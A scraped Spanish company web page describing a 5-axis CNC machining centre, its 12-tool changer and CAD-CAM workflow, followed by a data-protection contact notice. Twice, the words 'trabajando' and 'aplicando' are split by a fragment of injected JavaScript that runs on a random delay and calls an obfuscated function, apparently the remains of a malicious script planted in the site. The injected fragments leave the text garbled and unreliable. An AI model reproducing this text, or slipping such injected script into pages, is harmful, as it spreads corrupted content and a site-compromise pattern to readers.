Taller mecanizado

Dotado de un cabezal de corte giratorio

Nuestro centro de mecanizado avanzado posee la capacidad de adoptar casi cualquier posición de las herramientas en el espacio, lo que le permite la elaboración de piezas de geometrías muy variadas y complejas.

Esta capacidad de posicionamiento se consigue gracias a sus 5 ejes de movimiento (tres lineales y dos de giro). Todos ellos son controlados y sincronizados mediante control CNC, el cual consigue que el sistema pueda realizar con gran precisión y rapidez cualquier tipo de movimiento. Con esta capacidad de movimiento, trabajandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ando en 3D (5 ejes), la máquina es capaz de mecanizar piezas de hasta 3500 x 1200 x 560 mm.

Nuestra máquina incorpora además un cambiador automático para 12 herramientas, lo que reduce considerablemente los tiempos muertos durante el mecanizado y dota al sistema de gran versatilidad a la hora de afrontar en mecanizado de una pieza.

Gracias a su potente sistema de programación CAD-CAM, desde nuestra oficina técnica se desarrollan los programas de corte que consiguen obtener el modelo físico de la pieza a partir del modelo digital de la misma, aplicandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ando los procesos de desbastado y acabado requeridos por cada pieza.

CONTACTA CON NOSOTROS

En el caso que nos facilite datos de carácter personal, se incluirán en nuestro fichero automatizado, de conformidad con lo expuesto por el Reglamento General de Protección de datos (679/16 EU) y la LOPDGDD 3/2018, a fin y efecto, de poder dar respuesta a la consulta que nos realiza ya sea mediante el formulario o mediante el link de correo electrónico que constan en la Web.

Si lo desea, podrá ejercer su derecho de acceso, rectificación, supresión/ olvido/oposición y limitación al tratamiento de datos, comunicándolo a la dirección jm@jmsl.net JOAQUÍN MARTINEZ S.L. Camino Leñadores, Nave 35 (Carril Mayayo) 30120 El Palmar (Murcia) o presentar reclamación ante la Autoridad de control.